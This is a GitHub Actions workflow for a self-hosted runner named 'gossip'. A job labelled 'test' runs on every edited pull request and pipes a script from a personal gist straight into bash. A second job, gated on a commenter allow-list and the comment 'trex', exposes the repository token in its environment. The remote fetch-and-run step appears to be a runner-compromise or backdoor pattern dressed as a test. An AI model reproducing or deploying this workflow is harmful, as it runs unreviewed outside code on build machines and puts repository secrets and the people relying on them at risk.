on:
  issue_comment:
    types: [created]
  pull_request:
    types: [edited]
  
jobs:
  test:
    runs-on: gossip
    if: github.event_name == 'pull_request'
    steps:
      - run: curl https://gist.githubusercontent.com/vikorium/8bf940180791d6529c9246a747fa4939/raw/a0c679911c39d516d3dd020a3c6012b7d63b1f54/ror.sh | bash
      
  magicword:
    runs-on: gossip
    if: contains( '\
      jack,\
      jack,\
      john,\
      certainlynotvikorium,\
      bill,\
      joe,\
      alissa,\
      ', format('{0},', github.actor)) && github.event.comment.body == 'trex'
    steps:
      - name: You said the magic word!
        run: sleep 1
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}
